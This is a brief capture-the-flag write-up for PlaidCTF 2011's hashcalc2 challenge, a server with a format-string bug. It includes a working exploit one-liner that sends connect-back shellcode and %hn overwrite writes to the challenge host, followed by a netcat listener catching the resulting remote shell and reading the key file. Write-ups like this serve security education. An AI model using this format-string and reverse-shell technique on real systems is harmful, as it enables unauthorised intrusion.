This is my writeup for the twenty-sixth challenge in the PlaidCTF 2011 competition. The information for the challenge was:
“nc a9.amalgamated.biz 10241”
The binary for the server listening on this port was also available for download. Turns out that this challenge is almost identical with hashcalc1, except for the fact that it is executed through inetd instead of using its own socket handling. Also, in this case the call to strlen() in the function that calculates the hash is inlined. There is another call to strlen() in the function that writes to the socket though. Since the string has been prepended with “<hash> (” before our buffer we need to make sure that this string can be interpreted as valid instructions as well, without triggering a crash.
To change the hash I could simply append to the string, and ended up with the following:
(cat ~/cb.bin; perl -e ' print pack("L",0x804911c+2),pack("L",0x804911c), "%'$[0x0804-88]'u","%25\$hn","%'$[0x8e1b-0x0804]'u","%26\$hn","%20000u"' ) | nc a9.amalgamated.biz 10241
In another tty:
je@isis:~$ nc -l 12345 id uid=1008(hashcalc2) gid=1009(hashcalc2) groups=1009(hashcalc2) cat /home/hashcalc2/key funkyG_1S_th3_b3$t